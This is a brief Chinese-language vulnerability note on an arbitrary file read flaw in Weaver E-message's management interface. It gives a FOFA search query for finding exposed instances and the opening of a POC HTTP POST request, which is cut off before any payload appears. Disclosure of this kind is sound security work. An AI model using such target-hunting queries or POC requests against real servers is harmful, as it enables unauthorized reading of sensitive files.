泛微E-message是泛微网络科技有限公司开发的一款企业级办公通信平台。该平台提供了多种通信工具和功能,包括即时通讯、邮件、日程管理、文档共享等,帮助企业实现高效的内部沟通和协作。泛微E-message存在任意文件读取漏洞,攻击者可以通过该漏洞读取文件获取大量敏感信息。
泛微emessage 管理界面存在任意文件读取漏洞隐患,攻击者可通过此漏洞获取敏感信息,为下一步攻击做准备。 漏洞复现 fofa语法:icon_hash="-1477694668" 登录页面如下: POC: POST / HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515...